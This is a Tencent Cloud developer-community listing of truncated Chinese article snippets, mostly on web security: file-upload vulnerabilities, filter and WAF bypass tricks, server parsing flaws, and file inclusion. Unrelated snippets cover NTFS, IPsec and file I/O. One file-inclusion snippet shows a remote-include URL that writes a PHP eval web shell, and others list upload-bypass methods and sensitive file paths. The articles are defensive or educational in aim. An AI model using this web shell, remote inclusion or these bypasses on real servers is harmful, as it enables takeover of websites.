- 综合排序
- 最热优先
- 最新优先
- 来自专栏Mirror的技术成长
web安全——文件上传
文件上传本身不是漏洞,但如果文件上传功能的限制出现纰漏,允许了不合法且影响网站安全的文件的上传 可以将不合法且影响网站安全稳定性的文件等内容上传的均为“文件上传漏洞” 黑方将文件上传后可通过手段执行以及上传的脚本文件 而文件上传功能是大多web应用均具备的功能(例如图片、附件、头像等)正常的将文件上传是合法的。 php 2 3 if( isset( $_POST[ 'Upload' ] ) ) { 4 // Where 等级: 添加了对文件格式、大小的检查机制 1 if( isset( $_POST[ 'Upload' ] ) ) { 2 // Check Anti-CSRF 而在安全领域下有一个名词:绕过(过狗) 通过Burp代理进行访问后拦击数据包并修改后释放上传 ?
95430发布于 2020-11-13 - 来自专栏用户7881870的专栏
文件系统安全-基于ntfs文件系统的安全设置
NTFS (New Technology File System),是 WindowsNT 环境的文件系统。新技术文件系统是Windows NT家族的限制级专用的文件系统。 NTFS取代了老式的FAT文件系统。NTFS 提供长文件名、数据保护和恢复,并通过目录和文件许可实现安全性。NTFS 支持大硬盘和在多个硬盘上存储文件。 第二步:打开虚拟机Windows server 2008 R2,进入到系统桌面。 第三步:在window service2008中创建两个用户test1和test2。 第五步:将D盘格式化为ntfs文件系统。 第六步:在D盘中创建一个test.txt文件,在里面添加内容为123456。 第七步:右键test文件,点击属性,进入属性界面。 第十一步:添加用户test2,权限为拒绝读取和执行,读取。点击应用即可。 第十二步:切换用户到test1。 第十三步:打开本地磁盘D,点击test文件,可以访问。 第十四步:切换用户到test2。
95530发布于 2021-05-18 - 来自专栏网络安全615
WEB安全基础 - - -文件上传(文件上传绕过)
对渲染/加载测试攻击 - 代码注入绕过 2. 超文本标记语言文本 .html text/html 2. 普通文本 .txt text/plain 3. PDF 文档 .pdf application/pdf 4. 后缀大小写绕过:(.Php) 在对后缀的判断中,如果只是对字符串进行单独的比较来判断是不是限制文件,可以采用后缀名大 小写绕过形式。 2. 绕过文件内容检测 一般通过检测文件内容来判断上传文件是否合法 方法: 1. 通过检测上传文件内容开始处的文件幻数来判断。 2. 文件加载检测 一般是调用API或函数对文件进行加载测试。 ,对于渲染测试基本上都能绕过 2.
5.3K20编辑于 2022-11-19 - 来自专栏全栈工程师修炼之路
安全之文件解析漏洞
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。 /xx.asp/xx.jpg (2) 第二种,在IIS6.0下,分号后面的不被解析,IIS6.0 都会把此类后缀文件成功解析为 asp 文件 wooyun.asp;.jpg { /xx.asp;.jpg IIS 7.5/ Nginx <8.03畸形解析漏洞 nginx是一款高性能的web服务器,使用非常广泛其不仅经常被用作反向代理,也可以非常好的支持PHP的运行,Nginx解析漏洞这个伟大的漏洞是我国安全组织 后缀解析:test.php.x1.x2.x3 经验之谈:php|php3|phtml //多可被Apache解析 0x05 lighttpd 解析漏洞 类似于最上面的Ngnix的解析漏洞;xx.jpg/ {Linux主机中不行,Linux允许这类文件存在} (2) 如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: SetHandler application
1.7K10发布于 2020-10-23 - 来自专栏全栈工程师修炼之路
安全之文件解析漏洞
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。 /xx.asp/xx.jpg (2) 第二种,在IIS6.0下,分号后面的不被解析,IIS6.0 都会把此类后缀文件成功解析为 asp 文件 wooyun.asp;.jpg { /xx.asp;.jpg IIS 7.5/ Nginx <8.03畸形解析漏洞 nginx是一款高性能的web服务器,使用非常广泛其不仅经常被用作反向代理,也可以非常好的支持PHP的运行,Nginx解析漏洞这个伟大的漏洞是我国安全组织 后缀解析:test.php.x1.x2.x3 经验之谈:php|php3|phtml //多可被Apache解析 0x05 lighttpd 解析漏洞 类似于最上面的Ngnix的解析漏洞;xx.jpg {Linux主机中不行,Linux允许这类文件存在} (2) 如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: SetHandler application
76120编辑于 2022-09-29 - 来自专栏python基础文章
网络安全——网络层安全协议(2)
(2)广域网:路由器到路由器模式,网关到网关模式。 (3)远程访问:拨号客户机,专网对Internet的访问。 (1)安全体系结构。包含一般的概念、安全需求和定义IPSec的技术机制。 (2)ESP协议。加密IP数据包的默认值、头部格式以及与加密封装相关的其他条款。 (3)AH协议。 SA(安全关联))表示了策略实施的具体细节,包括源/目的地址、应用协议、SPI(安全策略索引)等;SAD为进入和外出包处理维持一个活动的SA列表;SPD决定了整个VPN的安全需求。 ---- 2. (2)在IPSec驱动程序数据库中查找相匹配的出站SA,并将SA中的SPI插人IPSec包头。 (3)对数据包签名(完整性检查);如果要求机密,则另外加密数据包。 (2)通过目的地址和SPI,在IPSec驱动程序数据库中查找相匹配的人站SA。 (3)检查签名,对数据包进行解密(如果是加密包的话)。
90420编辑于 2023-10-15 - 来自专栏性能与架构
web安全 - 文件上传漏洞
文件上传本身是互联网中最为常见的一种功能需求,所以文件上传漏洞攻击是非常常见,并且是危害极大的 常见安全问题 1) 上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行 2) 上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为 3) 上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行 4) 上传文件是钓鱼图片或为包含了脚本的图片 ,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈 常见的攻击方式就是攻击者上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力 案例 攻击者利用这些功能上传一个网页木马 防御 这个漏洞有两个必要条件 一是可以上传木马 二是存放上传文件的目录具备执行脚本的权限 那么首先要做的就是过滤上传的文件,但即使做了各种安全过滤,限制木马上传,实际还是会有各种绕过过滤的攻击方法 ,也因为文件服务器不能执行脚本而没有办法实施攻击 ?
1.6K70发布于 2018-04-03 - 来自专栏小白安全
文件包含漏洞-懒人安全
一.漏洞描述 文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件是使用硬编码的,那么一般是不会出现安全问题,但是有时可能不确定需要包含哪些具体文件 c:\windows\my.ini mysql配置文件 LINUX: /etc/passwd /usr/local/app/apache2/conf page=http://www.xx2.com/test.txt则会在服务器根目录下生产一个shell.php内容为:<?php eval($_POST[nmask]);? (2)采用前两种方式,只能包含当前web应用的界面,但c:import可以包含容器之外的内容。 0x03 asp文件包含漏洞 asp似乎无法包含远程文件(iis安全设置),只能包含本地文件,语法如下: <!
1.8K80发布于 2018-04-16 - 来自专栏信安之路
代码安全之上传文件
客户端JS验证 原理介绍 通过JS验证上传文件类型是最不安全的做法,因为这个方式是最容易被绕过的。我们先来看下JS实现文件检测的代码如下: ? 绕过姿势 1 通过firefox的F12修改js代码绕过验证 2 使用burp抓包直接提交,绕过js验证 服务端MIME类型检测 MIME类型介绍 不同的文件类型有不同的MIME头,常见的MIME头如下 绕过技巧 1 使用大小写绕过(针对对大小写不敏感的系统如windows),如:PhP 2 使用黑名单外的脚本类型,如:php5 3 借助文件解析漏洞突破扩展名验证,如:test.jpg.xxx(apache 如: PNG: 文件头标识 (8 bytes) 89 50 4E 47 0D 0A 1A 0A JPEG: 文件头标识 (2 bytes): 0xff, 0xd8 (SOI) (JPEG 文件标识) GIF 安全建议 1 使用白名单限制可以上传的文件扩展 2 验证文件内容,使用正则匹配恶意代码限制上传 3 对上传后的文件统一随机命名,不允许用户控制扩展名 4 修复服务器可能存在的解析漏洞 5 严格限制可以修改服务器配置的文件上传如
1.8K00发布于 2018-08-08 - 来自专栏信安之路
代码安全之文件包含
漏洞成因 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP文件包含漏洞代码 ? 以上代码保存为 http://www.test.com/index.php 本地文件包含 包含系统文件 windows ? linux 普通权限: ? root权限: ? > 2 使用菜刀连接 http://www.test.com/index.php? 下面是该文件的内容: ? /boot.ini/………[…]………… 防御措施 1 尽量不要用户控制文件包含的参数 2 开启open_basedir函数,将其设置为指定目录,则只有该目录的文件允许被访问。
89400发布于 2018-08-08 - 来自专栏网络安全615
WEB安全基础 - - -文件上传
目录 一,文件上传简介 二,文件上传漏洞简介 三,文件上传漏洞出现的原因 四,Webshell简介 五,Webshell基本原理 六,Webshell管理工具 中国菜刀 蚁剑-AntSword 二,文件上传漏洞简介 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。 常见场景是Web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。 三,文件上传漏洞出现的原因 1. 服务器配置不当 2. 文件上传限制被绕过 3. 开源编辑器的上传漏洞 4. 文件解析漏洞导致文件执行 5. 下载 AntSword - Loader https://github.com/AntSwordProject/AntSword-Loader/releases 2.
1.3K30编辑于 2022-11-19 - 来自专栏火丁笔记
如何安全的Include文件
似乎多数人都觉得Include文件是一件非常简单的事情,可惜漏洞往往出现在我们忽视的地方。 正所谓千里之堤溃于蚁穴,二战期间,法国人寄希望与马奇诺防线,却忽视了原本认为非常安全的阿登高地,让德国人有机可乘,最终的结果大家都知道了。 > 码农在代码中埋了一个调试开关,缺省是关闭状态,必要的时候可以开启,以便显示一些特殊的信息,同时代码里包含了一个配置文件,它的内容大致如下所示: <? > 突然有一天,码农因为一些其它的缘由修改了配置文件,引入了一些临时变量: <?php $debug = true; $config = array( 'foo' => '... 配置文件里的临时变量(debug)污染了其它脚本的变量空间,进而导致代码执行的结果不再符合预期,最终问题也就在所难免了。 如何安全的Include文件?
62920编辑于 2021-12-14 - 来自专栏HACK学习
文件上传Bypass安全狗
再继续写的话就属于免杀的范畴了,过于模糊并且跑题了,并不是真正意义上的文件上传Bypass,那是写不完的。 上传文件时waf会检查哪里? 请求的url Boundary边界 MIME类型 文件扩展名 文件内容 常见扩展名黑名单: asp|asa|cer|cdx|aspx|ashx|ascx|asax php|php2|php3|php4| 上传文件都可以上传什么格式的文件?还是允许上传任意类型? 上传的文件会不会被重命名或者二次渲染? 0x03.1 增大文件大小 测试发现 waf对于Content-Disposition字段的长度验证不是很准确,因为我们可以想到它进行拦截的规则肯定是基于正则,那么我们想办法让安全狗拦截的正则匹配不到即可 结果对文件名进行修改全卒,在之前版本的某狗在filename= ;是可以进行绕过的,4.0版本文件名修改全卒 0x03.3 修改文件名后缀 经典的iis6.0解析漏洞尝试,拦截 ?
1.6K20发布于 2021-06-24 - 来自专栏用户7881870的专栏
文件系统安全-共享资源安全
一些情况下用户希望两台机器之间的文件系统能够更加紧密地结合在一起,让一台主机上的用户可以像使用本机的文件系统一样使用远程机的文件系统,这种功能可以通过共享文件系统来实现。 随着计算机网络技术的发展,网络技术的应用也越来越多,基于网络的共享文件系统也得到了大量使用。。 第二步:打开虚拟机Windows server 2008 R2,进入到系统桌面。 第三步:打开命令指示符,输入“net share”看查全部文件共享文件夹 第四步:在桌面创建一个名为“sharedelete”的文本文档,用来编写bat脚本。 Net share C$ /del Net share D$ /del Net share IPS$ /del Net share admin$ /del 第六步:将sharedelete.txt的文件类型改为
74430发布于 2021-05-18 - 来自专栏用户7881870的专栏
用户账户安全-域用户配置文件安全
有三种主要的配置文件类型: 本地用户配置文件。在用户第一次登录到计算机上时被创建,这个本地用户配置文件被储存在计算机的本地硬盘驱动器上。 临时配置文件允许用户登录并改正任何可能导致配置文件加载失败的配置。临时配置文件在每次会话结束后都将被删除--注销时对桌面设置和文件所作的更改都会丢失。 第七步:在windows server 2008R2中,在任务栏中点击“开始”,选择“管理工具”,找到“Active Directory用户和计算机”后点击进入。 第十四步:在属性界面中选择“安全”,点击“高级”,进行权限的赋予 第十五步:点击“更改权限”,进行用户权限的添加与删除。 第十六步:点击“包括可从该对象的父项继成的权限”。 选择“其他用户” 输入“测试”用户的账号和密码进行登录 登录后,回到虚拟机windows server2008中,打开本地磁盘D中的测试文件夹,发现有.V2文件,说明实验成功。
1.9K20发布于 2021-05-18 - 来自专栏python3
python 文件操作2
f.write("---hello---\n") print(f.tell()) f.seek(10) print(f.tell()) print(f.readline()) f.write("---hello2- --\n") f.close() 执行输出 39 10 - 查看文件内容 ---hello--- ---hello--- ---hello--- ---hello2--- 从内容上来看,指针设置不生效, 1. socket网络传输 2. 在Python 2.7 后,with又支持同时对多个文件的上下文进行管理,即: with open('log1') as obj1, open('log2') as obj2: pass 举个例子 if "雨露" in line: line = line.replace("雨露","中国") f_new.write(line) 由于with 打开2个文件
76710发布于 2018-08-02 - 来自专栏饶文津的专栏
C 文件读写2
feof()函数同时适用于ASCII码文件和二进制文件。 处理二进制文件一般要用fread()和fwrite()函数。 (1)参照点(3种取值): SEEK_SET ──值为0,表示文件头 SEEK_CUR──值为1,表示当前位置 SEEK_END──值为2,表示文件尾 (2)位移量: 以参照点为起点,向前(当位移量>0 ftell() long ftell(FILE *stream); 返回文件当前位置 顺序存取文件特点: 通常是文本文件,使用fscanf和fprintf函数。 文件中的记录可以有不同的长度。 不能直接快速地访问文件中的某一记录,而必须从文件中第一个记录开始访问。 新的记录只能插入到文件尾。 随机存取文件特点: 通常是二进制文件,使用fread和fwrite函数 文件中的记录具有相同的长度。 能够直接快速地定位、访问文件中的某一记录。 新记录可以插入到希望的位置。 摘自计导PPT课件
75720发布于 2020-06-02 Python 文件IO(2)
读写文件: file对象提供了一系列方法,能让我们的文件访问更轻松。来看看如何使用read()和write()方法来读取和写入文件。 \n") # 关闭打开的文件 fo.close() 上述方法会创建foo.txt文件,并将收到的内容写入该文件,并最终关闭文件。 如果from被设为0,这意味着将文件的开头作为移动字节的参考位置。如果设为1,则使用当前的位置作为参考位置。如果它被设为2,那么该文件的末尾将作为参考位置。 语法: os.remove(file_name) 例子: 下例将删除一个已经存在的文件test2.txt。 #! /usr/bin/python # -*- coding: UTF-8 -*- import os # 删除一个已经存在的文件test2.txt os.remove("test2.txt") Python
17210编辑于 2025-12-16- 来自专栏Ywrby
2-Yaml文件
# 存储对象 person: name: Jessica age: 18 # 对象的行内写法 person2: {name: Lily,age: 18} # 数组写法 fruit: - 编写application.yml person: name: Leslie age: 18 birth: 2021/2/14 state: true map: {k1: v1,k2 : v2} list: [l1,l2,l3] pet: name: Dog age: 3 测试结果 @SpringBootTest class SpringBootTestApplicationTests //Person{name='Leslie', age=18, birth=Sun Feb 14 00:00:00 CST 2021, state=true, map={k1=v1, k2= v2}, list=[l1, l2, l3], pet=Pet{name='Dog', age=3}} } } Yaml文件与properties为属性赋值的区别 — @ConfigurationProperties
72730编辑于 2022-10-27 - 来自专栏python基础文章
网络安全协议(2)
2.CC体系一共包括3大部分 分别是:信息技术安全性评价通用准则,信息技术安全评价通用方法,通用准则识别协议。 该部分是CC的总体结构简介,定义了信息技术安全性评估的一般概念和原理,并提出了评估的一般模型。整个评估的过程都要遵循这个一般模型。 第2部分:安全功能组件。 作为安全性评估对象的一系列软件、固件或硬件以及它们的文档,如操作系统、防火墙产品、计算机网络、密码模块等,以及相关的管理员指南、用户指南、设计方案等文档。 (2)保护轮廓(PP)。 EAL2:结构性测试级,证明TOE与系统层次设计概念一致。 EAL.3:工程方法上的测试及验证级,证明TOE在设计上采用了积极安全操作系统安全测评研究的工程方法。 EAL.7:形式化地验证设计和测试级,证明TOE的所有安全功能经得起全面的形式化分析 安全级别和组件之间的关系可以用一张表概括,如表1-2所示。
67850编辑于 2023-10-15
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号